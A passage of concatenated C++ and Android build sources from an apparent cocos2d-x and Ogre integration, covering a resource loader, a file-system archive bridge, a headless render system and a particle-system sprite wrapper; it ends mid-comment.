// Destroy an entity created by createEntity; no-op without a scene manager.
void OgreManager::destroyEntity(Ogre::Entity* entity)
{
	if (!mSceneMgr)
		return;
	mSceneMgr->destroyEntity(entity);
}
// Register a script resource with the first manager whose filename
// patterns accept it: script compiler, then fonts, then overlays.
void OgreManager::addResourceByName(const std::string &nameStr, const std::string &gropStr)
{
	if (addResourceForManager(nameStr, gropStr, Ogre::ScriptCompilerManager::getSingletonPtr()))
		return;
	if (addResourceForManager(nameStr, gropStr, Ogre::FontManager::getSingletonPtr()))
		return;
	addResourceForManager(nameStr, gropStr, Ogre::OverlayManager::getSingletonPtr());
}
// Delete the named resource file from the given resource group.
void OgreManager::removeResourceByName(const std::string &name, const Ogre::String &grop)
{
	Ogre::ResourceGroupManager::getSingleton().deleteResource(name,grop);
}
// Parse `name` with `loader` if the file name matches one of the loader's
// script patterns (e.g. "*.material" -> match on ".material").
// Returns true when at least one pattern matched and the file was parsed.
// (fixed: reuse the already-computed `pos1` instead of calling find('*')
//  a second time)
bool OgreManager::addResourceForManager(const std::string &name, const std::string &grop, Ogre::ScriptLoader * loader)
{
	bool ret = false;
	const Ogre::StringVector& patterns = loader->getScriptPatterns();
	for (Ogre::StringVector::const_iterator p = patterns.begin(); p != patterns.end(); ++p)
	{
		Ogre::String temp(*p);
		// Strip a leading wildcard: "*.material" -> ".material".
		size_t pos1 = temp.find('*');
		if (pos1 != Ogre::String::npos)
		{
			temp = temp.substr(pos1 + 1);
		}
		// NOTE(review): rfind != npos tests "contains", not "ends with".
		if (name.npos != name.rfind(temp))
		{
			Ogre::DataStreamPtr dstream =
				Ogre::ResourceGroupManager::getSingleton().openResource(
				name, grop);
			loader->parseScript(dstream, grop);
			ret = true;
		}
	}
	return ret;
}
NS_CC_END<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreStableHeaders.h"
#include "OgreLogManager.h"
#include "OgreException.h"
#include "OgreStringVector.h"
#include "OgreRoot.h"
#include "OgreBridgeFileSystemArchive.h"
#include "cocos2d.h"
namespace Ogre {
// Whether hidden files are skipped when enumerating; this bridge archive
// never enumerates, so the flag is currently unused by the code below.
bool BridgeFileSystemArchive::msIgnoreHidden = true;
//-----------------------------------------------------------------------
// Thin Ogre::Archive adapter over cocos2d's FileUtils; construction only
// forwards the name/type to the base class.
BridgeFileSystemArchive::BridgeFileSystemArchive(const String& name, const String& archType)
: Archive(name, archType)
{
}
//-----------------------------------------------------------------------
// File-name case sensitivity follows the host platform convention.
bool BridgeFileSystemArchive::isCaseSensitive(void) const
{
#if OGRE_PLATFORM == OGRE_PLATFORM_WIN32
    return false;
#else
    return true;
#endif
}
//-----------------------------------------------------------------------
BridgeFileSystemArchive::~BridgeFileSystemArchive()
{
    unload();
}
//-----------------------------------------------------------------------
// Marks the archive writable; no other per-load state is kept.
void BridgeFileSystemArchive::load()
{
    mReadOnly = false;
}
//-----------------------------------------------------------------------
void BridgeFileSystemArchive::unload()
{
    // nothing to see here, move along
}
//-----------------------------------------------------------------------
// Opens a file through cocos2d's FileUtils and returns its entire content
// as an in-memory stream. The `readOnly` flag is ignored: the caller
// always receives a private copy of the file data.
// NOTE(review): if the file cannot be read, `data` is empty and an empty
// stream is returned instead of an error -- confirm callers expect this.
DataStreamPtr BridgeFileSystemArchive::open(const String& filename, bool readOnly) const
{
    cocos2d::Data data = cocos2d::FileUtils::getInstance()->getDataFromFile(filename);
    MemoryDataStreamPtr streamPtr;
    streamPtr.bind(new MemoryDataStream(data.getSize()));
    // Copy the bytes out because `data` is destroyed when this scope ends.
    uchar* pDst = streamPtr->getPtr();
    memcpy(pDst, data.getBytes(), data.getSize());
    return DataStreamPtr(streamPtr);
}
//---------------------------------------------------------------------
// File creation is not implemented for this bridge archive: the original
// fstream-based implementation is kept below (disabled) for reference,
// and a null stream is always returned.
// NOTE(review): returning an empty DataStreamPtr silently -- callers that
// expect Archive::create to either succeed or throw should be checked.
DataStreamPtr BridgeFileSystemArchive::create(const String& filename) const
{
    /*if (isReadOnly())
    {
    OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
    "Cannot create a file in a read-only archive",
    "FileSystemArchive::remove");
    }
    String full_path = cocos2d::FileUtils::getInstance()->fullPathForFilename(filename);
    // Always open in binary mode
    // Also, always include reading
    std::ios::openmode mode = std::ios::out | std::ios::binary;
    std::fstream* rwStream = OGRE_NEW_T(std::fstream, MEMCATEGORY_GENERAL)();
    rwStream->open(full_path.c_str(), mode);
    // Should check ensure open succeeded, in case fail for some reason.
    if (rwStream->fail())
    {
    OGRE_DELETE_T(rwStream, basic_fstream, MEMCATEGORY_GENERAL);
    OGRE_EXCEPT(Exception::ERR_FILE_NOT_FOUND,
    "Cannot open file: " + filename,
    "FileSystemArchive::create");
    }
    /// Construct return stream, tell it to delete on destroy
    FileStreamDataStream* stream = OGRE_NEW FileStreamDataStream(filename,
    rwStream, 0, true);
    */
    return DataStreamPtr();
}
//---------------------------------------------------------------------
// Deleting files is deliberately unsupported; always throws.
void BridgeFileSystemArchive::remove(const String& filename) const
{
    OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
        "Cannot remove a file from a read-only archive",
        "BridgeFileSystemArchive::remove");
}
//-----------------------------------------------------------------------
// Enumeration is not supported by the cocos2d bridge; returns an empty
// list (the findFiles call is disabled below).
StringVectorPtr BridgeFileSystemArchive::list(bool recursive, bool dirs)
{
    // directory change requires locking due to saved returns
    // Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
    StringVectorPtr ret(OGRE_NEW_T(StringVector, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
    //findFiles("*", recursive, dirs, ret.getPointer(), 0);
    return ret;
}
//-----------------------------------------------------------------------
// See list(): enumeration is unsupported, so an empty list is returned.
FileInfoListPtr BridgeFileSystemArchive::listFileInfo(bool recursive, bool dirs)
{
    // Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
    FileInfoListPtr ret(OGRE_NEW_T(FileInfoList, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
    return ret;
}
//-----------------------------------------------------------------------
// Pattern search is unsupported; always returns an empty list.
StringVectorPtr BridgeFileSystemArchive::find(const String& pattern,
bool recursive, bool dirs)
{
    // Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
    StringVectorPtr ret(OGRE_NEW_T(StringVector, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
    return ret;
}
//-----------------------------------------------------------------------
// Pattern search is unsupported; always returns an empty list.
FileInfoListPtr BridgeFileSystemArchive::findFileInfo(const String& pattern,
bool recursive, bool dirs) const
{
    // Note that we have to tell the SharedPtr to use OGRE_DELETE_T not OGRE_DELETE by passing category
    FileInfoListPtr ret(OGRE_NEW_T(FileInfoList, MEMCATEGORY_GENERAL)(), SPFM_DELETE_T);
    return ret;
}
//-----------------------------------------------------------------------
// Existence check is forwarded to cocos2d's search-path-aware FileUtils.
bool BridgeFileSystemArchive::exists(const String& filename)
{
    return cocos2d::FileUtils::getInstance()->isFileExist(filename);
}
//---------------------------------------------------------------------
// Modification times are unavailable through this bridge; always 0.
time_t BridgeFileSystemArchive::getModifiedTime(const String& filename)
{
    return 0;
}
//-----------------------------------------------------------------------
// Archive-type identifier under which this factory registers with Ogre;
// resource locations declared with type "BridgeFileSystem" use it.
const String& BridgeFileSystemArchiveFactory::getType(void) const
{
    static String name = "BridgeFileSystem";
    return name;
}
}
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCParticleSprite3D_H__
#define __CCParticleSprite3D_H__
#include "cocos2d.h"
#include "OgreOgreSprite3D.h"
#include <ParticleUniverseCommon.h>
#include <ParticleUniverseSystemListener.h>
namespace ParticleUniverse
{
class ParticleSystem;
}
NS_CC_BEGIN
/** Particle Universe system wrapper node. */
class ParticleSprite3D :
    public OgreSprite3D,
    public ParticleUniverse::ParticleSystemListener
{
public:
    // Requests the particle system to start on the next update() tick.
    void showParticle();
    // Fades the particle system out; the stop is reported back through
    // the ParticleSystemListener callback.
    void stopParticle();
    // Once the system has stopped, remove this node from its parent.
    void autoRemoveSelf();
    // Forwarded to ParticleSystem::setKeepLocal.
    void setKeepLocal(bool isLocal);
    // Factory: autoreleased sprite for the given Particle Universe type.
    static ParticleSprite3D* create(const std::string &typeName);
    // No-op placeholder; dynamic attribute tweaking is not implemented.
    void setDynamicAttribute(const std::string &attributeName,float value){}
    // ParticleSystemListener hook: records starting/stopping transitions
    // so update() can apply them on the node's own tick.
    virtual void handleParticleSystemEvent(ParticleUniverse::ParticleSystem* particleSystem, ParticleUniverse::ParticleUniverseEvent& particleUniverseEvent) override;
    // Pushes the node's scale into the particle system on transform updates.
    virtual void updateParentTransform(const Mat4& parentTransform);
CC_CONSTRUCTOR_ACCESS:
    ParticleSprite3D();
    virtual ~ParticleSprite3D();
    bool initWithFile( const std::string &typeName);
    virtual void update(float delta) override;
protected:
    // Pending state transition reported by the listener callback.
    enum StateType
    {
        PARTICLE_NONE,
        PARTICLE_STARTING,
        PARTICLE_STOPPING
    };
    bool mIsRunning;            // true while the system should be stepped
    StateType mStateType;       // last transition reported by the listener
    bool mParticleStateDirty;   // mStateType not yet consumed by update()
    bool mIsStartParticle;      // set by showParticle(); consumed in update()
    bool mIsAutoRemoveSelf;     // remove the node from its parent once stopped
    ParticleUniverse::ParticleSystem *mParticleSystem;
};
NS_CC_END
#endif // __CCParticleSprite3D_H__
<file_sep>
/* Copyright 2013 <NAME> / <EMAIL>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "OgreBridgeRenderSystem.h"
#include "components/OgreBridgeBufferManager.h"
#include "components/OgreBridgeTextureManager.h"
#include "components/OgreBridgeGpuProgramManager.h"
namespace Ogre
{
// Headless render system: construction immediately builds all managers
// and capabilities via reinitialise().
BridgeRenderSystem::BridgeRenderSystem() :
    RenderSystem(),
    mTextureManager(0),
    mHardwareBufferManager(0)
{
    LogManager::getSingleton().logMessage("BridgeRenderSystem ctor", Ogre::LML_TRIVIAL);
    reinitialise();
}
// Releases the owned managers; shutdown() tolerates repeated calls.
BridgeRenderSystem::~BridgeRenderSystem()
{
    LogManager::getSingleton().logMessage("BridgeRenderSystem dtor", Ogre::LML_TRIVIAL);
    shutdown();
}
// Name under which this render system registers with Ogre::Root.
const String& BridgeRenderSystem::getName(void) const
{
    static String renderSystemName("Bridge Rendering Subsystem");
    return renderSystemName;
}
// Window-based initialisation is deliberately unsupported: this plugin
// is headless-only, so reaching here is a configuration error.
RenderWindow* BridgeRenderSystem::_initialise(bool autoCreateWindow, const String& windowTitle)
{
    OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
        String("BridgeRenderSystem cannot be initialized. This indicates Ogre::Root::initialize() was called and you are about to create a rendering window. ") +
        String("This rendering plugin is for headless operation only."),
        "BridgeRenderSystem::_initialise");
    return 0;
}
// Tears down any existing managers and rebuilds texture, hardware-buffer
// and GPU-program managers plus the capabilities object. Called from the
// constructor and available for an explicit reset.
void BridgeRenderSystem::reinitialise()
{
    LogManager::getSingleton().logMessage("BridgeRenderSystem::reinitialise", Ogre::LML_TRIVIAL);
    shutdown();
    mTextureManager = OGRE_NEW BridgeHardwareTextureManager();
    mHardwareBufferManager = OGRE_NEW BridgeHardwareBufferManager();
    mRealCapabilities = createRenderSystemCapabilities();
    // Respect externally supplied capabilities if the user set custom ones.
    if (!mUseCustomCapabilities)
        mCurrentCapabilities = mRealCapabilities;
    mGpuProgramManager = OGRE_NEW BridgeGpuProgramManager();
}
// Releases every manager this render system owns. Idempotent: the guard
// skips the body (and its log line) when nothing is left to release.
// Called from the destructor and from reinitialise().
void BridgeRenderSystem::shutdown(void)
{
    // Fixed: the guard now also checks mGpuProgramManager. The original
    // test only looked at the first two managers, so a state where only
    // the GPU program manager was live would leak it.
    if (!mTextureManager && !mHardwareBufferManager && !mGpuProgramManager)
        return;
    LogManager::getSingleton().logMessage("BridgeRenderSystem::shutdown", Ogre::LML_TRIVIAL);
    if (mTextureManager)
        OGRE_DELETE mTextureManager;
    mTextureManager = 0;
    if (mHardwareBufferManager)
        OGRE_DELETE mHardwareBufferManager;
    mHardwareBufferManager = 0;
    if (mGpuProgramManager)
        OGRE_DELETE mGpuProgramManager;
    mGpuProgramManager = 0;
}
// Builds the capabilities object reported by this headless render system.
// Mixes hard-coded GLES2-style capabilities with a few live glGet* queries;
// the device/vendor detection from the GLES2 implementation is kept below
// in disabled form for reference.
RenderSystemCapabilities* BridgeRenderSystem::createRenderSystemCapabilities() const
{
    RenderSystemCapabilities* rsc = OGRE_NEW RenderSystemCapabilities();
    rsc->setCategoryRelevant(CAPS_CATEGORY_GL, true);
    rsc->setDriverVersion(mDriverVersion);
    /*const char* deviceName = (const char*)glGetString(GL_RENDERER);
    const char* vendorName = (const char*)glGetString(GL_VENDOR);
    if (deviceName)
    {
    rsc->setDeviceName(deviceName);
    }*/
    rsc->setRenderSystemName(getName());
    // Determine vendor
    /*if (strstr(vendorName, "Imagination Technologies"))
    rsc->setVendor(GPU_IMAGINATION_TECHNOLOGIES);
    else if (strstr(vendorName, "Apple Computer, Inc."))
    rsc->setVendor(GPU_APPLE); // iOS Simulator
    else if (strstr(vendorName, "NVIDIA"))
    rsc->setVendor(GPU_NVIDIA);
    else
    rsc->setVendor(GPU_UNKNOWN);*/
    // Multitexturing support and set number of texture units
    GLint units;
    glGetIntegerv(GL_MAX_TEXTURE_IMAGE_UNITS, &units);
    rsc->setNumTextureUnits(units);
    // Check for hardware stencil support and set bit depth
    GLint stencil;
    glGetIntegerv(GL_STENCIL_BITS, &stencil);
    //CHECK_GL_ERROR_DEBUG();
    if(stencil)
    {
        rsc->setCapability(RSC_HWSTENCIL);
        rsc->setCapability(RSC_TWO_SIDED_STENCIL);
        rsc->setStencilBufferBitDepth(stencil);
    }
    // Scissor test is standard
    rsc->setCapability(RSC_SCISSOR_TEST);
    // Vertex Buffer Objects are always supported by OpenGL ES
    rsc->setCapability(RSC_VBO);
    rsc->setCapability(RSC_FBO);
    rsc->setCapability(RSC_HWRENDER_TO_TEXTURE);
    rsc->setNumMultiRenderTargets(1);
    // Cube map
    rsc->setCapability(RSC_CUBEMAPPING);
    // Stencil wrapping
    rsc->setCapability(RSC_STENCIL_WRAP);
    // GL always shares vertex and fragment texture units (for now?)
    rsc->setVertexTextureUnitsShared(true);
    // Hardware support mipmapping
    rsc->setCapability(RSC_AUTOMIPMAP);
    // Blending support
    rsc->setCapability(RSC_BLENDING);
    rsc->setCapability(RSC_ADVANCED_BLEND_OPERATIONS);
    // DOT3 support is standard
    rsc->setCapability(RSC_DOT3);
    // Point size
    GLfloat psRange[2] = {0.0, 0.0};
    glGetFloatv(GL_ALIASED_POINT_SIZE_RANGE, psRange);
    CHECK_GL_ERROR_DEBUG();
    rsc->setMaxPointSize(psRange[1]);
    // Point sprites
    rsc->setCapability(RSC_POINT_SPRITES);
    rsc->setCapability(RSC_POINT_EXTENDED_PARAMETERS);
    // GLSL ES is always supported in GL ES 2
    rsc->addShaderProfile("glsles");
    LogManager::getSingleton().logMessage("GLSL ES support detected");
#if !OGRE_NO_GLES2_CG_SUPPORT
    rsc->addShaderProfile("cg");
    rsc->addShaderProfile("ps_2_0");
    rsc->addShaderProfile("vs_2_0");
#endif
    // UBYTE4 always supported
    rsc->setCapability(RSC_VERTEX_FORMAT_UBYTE4);
    // Infinite far plane always supported
    rsc->setCapability(RSC_INFINITE_FAR_PLANE);
    // Vertex/Fragment Programs
    rsc->setCapability(RSC_VERTEX_PROGRAM);
    rsc->setCapability(RSC_FRAGMENT_PROGRAM);
#if OGRE_NO_GLES2_GLSL_SUPPORT == 0
    GLfloat floatConstantCount = 0;
    glGetFloatv(GL_MAX_VERTEX_UNIFORM_VECTORS, &floatConstantCount);
    rsc->setVertexProgramConstantFloatCount((Ogre::ushort)floatConstantCount);
    rsc->setVertexProgramConstantBoolCount((Ogre::ushort)floatConstantCount);
    rsc->setVertexProgramConstantIntCount((Ogre::ushort)floatConstantCount);
    // Fragment Program Properties
    floatConstantCount = 0;
    glGetFloatv(GL_MAX_FRAGMENT_UNIFORM_VECTORS, &floatConstantCount);
    rsc->setFragmentProgramConstantFloatCount((Ogre::ushort)floatConstantCount);
    rsc->setFragmentProgramConstantBoolCount((Ogre::ushort)floatConstantCount);
    rsc->setFragmentProgramConstantIntCount((Ogre::ushort)floatConstantCount);
#endif
    // Geometry programs are not supported, report 0
    rsc->setGeometryProgramConstantFloatCount(0);
    rsc->setGeometryProgramConstantBoolCount(0);
    rsc->setGeometryProgramConstantIntCount(0);
    // Check for Float textures
#if GL_OES_texture_float || GL_OES_texture_half_float
    rsc->setCapability(RSC_TEXTURE_FLOAT);
#endif
    // Alpha to coverage always 'supported' when MSAA is available
    // although card may ignore it if it doesn't specifically support A2C
    rsc->setCapability(RSC_ALPHA_TO_COVERAGE);
    // No point sprites, so no size
    // NOTE(review): this overrides the psRange[1] max point size set above
    // (and contradicts RSC_POINT_SPRITES being enabled) -- confirm which
    // value is intended before relying on point-sprite sizes.
    rsc->setMaxPointSize(0.f);
    return rsc;
}
// Headless system exposes a single (empty) option map.
ConfigOptionMap& BridgeRenderSystem::getConfigOptions(void)
{
    return mHeadlessOptions;
}
// Window creation is deliberately unsupported: headless-only plugin.
RenderWindow* BridgeRenderSystem::_createRenderWindow(const String &name, unsigned int width, unsigned int height, bool fullScreen, const NameValuePairList *miscParams)
{
    OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
        "BridgeRenderSystem cannot create rendering windows. This rendering plugin is for headless operation only.",
        "BridgeRenderSystem::_createRenderWindow");
    return 0;
}
// Batch window creation is likewise unsupported; always throws.
bool BridgeRenderSystem::_createRenderWindows(const RenderWindowDescriptionList& renderWindowDescriptions, RenderWindowList& createdWindows)
{
    OGRE_EXCEPT(Exception::ERR_RENDERINGAPI_ERROR,
        "BridgeRenderSystem cannot create rendering windows. This rendering plugin is for headless operation only.",
        "BridgeRenderSystem::_createRenderWindows");
    return false;
}
}
<file_sep>LOCAL_PATH := $(call my-dir)
# Android.mk module: builds the Ogre GLES2 render system as a static library.
include $(CLEAR_VARS)
LOCAL_MODULE := rendersystem_static
LOCAL_MODULE_FILENAME := librendersystem
# ogre_rendersystem
# Private include paths used while compiling this module.
LOCAL_OGRE_RENDER_GLES_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/common
# Source files of the GLES2 render system (common EGL support + GLES2 backend).
LOCAL_OGRE_RENDER_GLES_SRC_FILES := \
src/common/OgreCommonGLContext.cpp \
src/common/OgreCommonGLSupport.cpp \
src/common/OgreCommonWindow.cpp \
src/OgreGLES2Context.cpp \
src/OgreGLES2DefaultHardwareBufferManager.cpp \
src/OgreGLES2DepthBuffer.cpp \
src/OgreGLES2EngineDll.cpp \
src/OgreGLES2FBOMultiRenderTarget.cpp \
src/OgreGLES2FBORenderTexture.cpp \
src/OgreGLES2FrameBufferObject.cpp \
src/OgreGLES2GpuProgram.cpp \
src/OgreGLES2GpuProgramManager.cpp \
src/OgreGLES2HardwareBufferManager.cpp \
src/OgreGLES2HardwareIndexBuffer.cpp \
src/OgreGLES2HardwareOcclusionQuery.cpp \
src/OgreGLES2HardwarePixelBuffer.cpp \
src/OgreGLES2HardwareVertexBuffer.cpp \
src/OgreGLES2PixelFormat.cpp \
src/OgreGLES2Plugin.cpp \
src/OgreGLES2RenderSystem.cpp \
src/OgreGLES2RenderTexture.cpp \
src/OgreGLES2Support.cpp \
src/OgreGLES2Texture.cpp \
src/OgreGLES2TextureManager.cpp
# Headers exported to modules that link against this library.
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include/common
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_RENDER_GLES_INCLUDE)
LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_RENDER_GLES_SRC_FILES)
# Link the whole OgreMain static library (plugin registration needs all symbols).
LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main)<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "OgreParticleSprite3D.h"
#include "OgreOgreManager.h"
#include "OgreNodeProtocol.h"
#include <ParticleUniverseSystemManager.h>
NS_CC_BEGIN
// Factory: builds a ParticleSprite3D for the given Particle Universe
// system type. Returns an autoreleased node, or nullptr on failure.
ParticleSprite3D* ParticleSprite3D::create(const std::string &typeName)
{
    // Use the nothrow form for consistency with the rest of this code
    // base (allocation failure yields nullptr instead of throwing, and
    // is then handled by the null check below).
    auto node = new (std::nothrow) ParticleSprite3D();
    if (node && node->initWithFile(typeName))
    {
        node->autorelease();
        return node;
    }
    CC_SAFE_DELETE(node);
    return nullptr;
}
// Default-constructs the sprite with the particle state machine idle.
// Members are listed in declaration order (see the header) so the
// compiler initializes them in the order written here.
ParticleSprite3D::ParticleSprite3D() :
    mIsRunning(false),
    mStateType(PARTICLE_NONE),
    mParticleStateDirty(false),
    mIsStartParticle(false),   // fixed: was left uninitialized, but update() reads it every frame
    mIsAutoRemoveSelf(false),
    mParticleSystem(NULL)
{
}
// Detaches and destroys the owned particle system (if any), after
// unregistering this node as its event listener.
ParticleSprite3D::~ParticleSprite3D()
{
    if (mParticleSystem)
    {
        this->detachObject(mParticleSystem);
        mParticleSystem->removeParticleSystemListener(this);
        OgreManager::getInstance()->destroyParticleSystem(mParticleSystem);
        mParticleSystem = NULL;
    }
}
// Creates the Particle Universe system for `typeName`, attaches it to this
// node and registers for its events. Returns false if either the base
// sprite init or the system creation failed (the destructor then cleans
// up any system that was created).
bool ParticleSprite3D::initWithFile(const std::string &typeName)
{
    // Build a unique instance name from this object's address.
    std::stringstream ss;
    ss << this;
    std::string name = "ParticleSprite3D" + ss.str();
    mParticleSystem = OgreManager::getInstance()->createParticleSystem(typeName,name);
    if (OgreSprite3D::init() && mParticleSystem)
    {
        scheduleUpdate();
        this->attachObject(mParticleSystem);
        // The node drives the system manually from update(); disable the
        // internal controller and automatic bounds updates.
        mParticleSystem->setUseController(false);
        mParticleSystem->setBoundsAutoUpdated(false);
        mParticleSystem->addParticleSystemListener(this);
        return true;
    }
    return false;
}
// Defers the start to the next update() tick (see update()).
void ParticleSprite3D::showParticle()
{
    mIsStartParticle = true;
}
// Fades the system out; the actual stop is reported asynchronously via
// handleParticleSystemEvent().
void ParticleSprite3D::stopParticle()
{
    mParticleSystem->stopFade();
}
// Arms automatic removal of this node once the system has stopped.
void ParticleSprite3D::autoRemoveSelf()
{
    mIsAutoRemoveSelf = true;
}
// Forwarded to ParticleSystem::setKeepLocal.
void ParticleSprite3D::setKeepLocal(bool isLocal)
{
    mParticleSystem->setKeepLocal(isLocal);
}
// After the base sprite updates its transform, push the node's scale into
// the particle system and force a zero-delta update so the change takes
// effect immediately.
void ParticleSprite3D::updateParentTransform(const Mat4& parentTransform)
{
    OgreSprite3D::updateParentTransform(parentTransform);
    if (_nodeProtocol)
    {
        mParticleSystem->setScale(Ogre::Vector3(mCosScale.x,mCosScale.y,mCosScale.z));
        // NOTE(review): velocity is scaled by the x component only --
        // confirm non-uniform scales are not expected here.
        mParticleSystem->setScaleVelocity(mCosScale.x);
        mParticleSystem->_update(0);
    }
}
// Per-frame driver for the particle state machine:
//  1. a pending showParticle() request starts the system (and nothing
//     else happens that frame);
//  2. otherwise the system is stepped while running, then any state
//     transition recorded by the listener callback is applied.
void ParticleSprite3D::update(float delta)
{
    if(mIsStartParticle)
    {
        mIsStartParticle = false;
        mParticleSystem->start();
    }
    else
    {
        if(mIsRunning)
        {
            mParticleSystem->_update(delta);
        }
        if(mParticleStateDirty)
        {
            mParticleStateDirty = false;
            switch(mStateType)
            {
            case PARTICLE_STARTING:
                mIsRunning = true;
                break;
            case PARTICLE_STOPPING:
                mIsRunning = false;
                if(mIsAutoRemoveSelf) //cannot write any code after remove
                {
                    this->removeFromParent();
                }
                break;
            }
        }
    }
}
// Particle Universe callback: only the starting/stopping transitions are
// recorded here; they are applied on this node's own update() tick rather
// than inside the callback. All other event types are ignored (see the
// reference list below).
void ParticleSprite3D::handleParticleSystemEvent(ParticleUniverse::ParticleSystem* particleSystem, ParticleUniverse::ParticleUniverseEvent& particleUniverseEvent)
{
    switch(particleUniverseEvent.eventType)
    {
    case ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTING:
        mParticleStateDirty = true;
        mStateType = StateType::PARTICLE_STARTING;
        break;
    case ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPING:
        mParticleStateDirty = true;
        mStateType = StateType::PARTICLE_STOPPING;
        break;
    }
    /*
    ParticleUniverse::EventType::PU_EVT_SYSTEM_ATTACHING, // Submit event when the particle system is being attached or detached.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_ATTACHED, // Submit event when the particle system is attached or detached.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_PREPARING, // Submit event when the particle system is preparing.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_PREPARED, // Submit event when the particle system is prepared.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTING, // Submit event when the particle system is starting.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_STARTED, // Submit event when the particle system is started.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPING, // Submit event when the particle system is stopping.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_STOPPED, // Submit event when the particle system is stopped.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_PAUSING, // Submit event when the particle system is pausing.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_PAUSED, // Submit event when the particle system is paused.
    ParticleUniverse::EventType::PU_EVT_SYSTEM_RESUMING, // Submit event when the particle system is resuming (after a pause).
    ParticleUniverse::EventType::PU_EVT_SYSTEM_RESUMED, // Submit event when the particle system is resumed (after a pause).
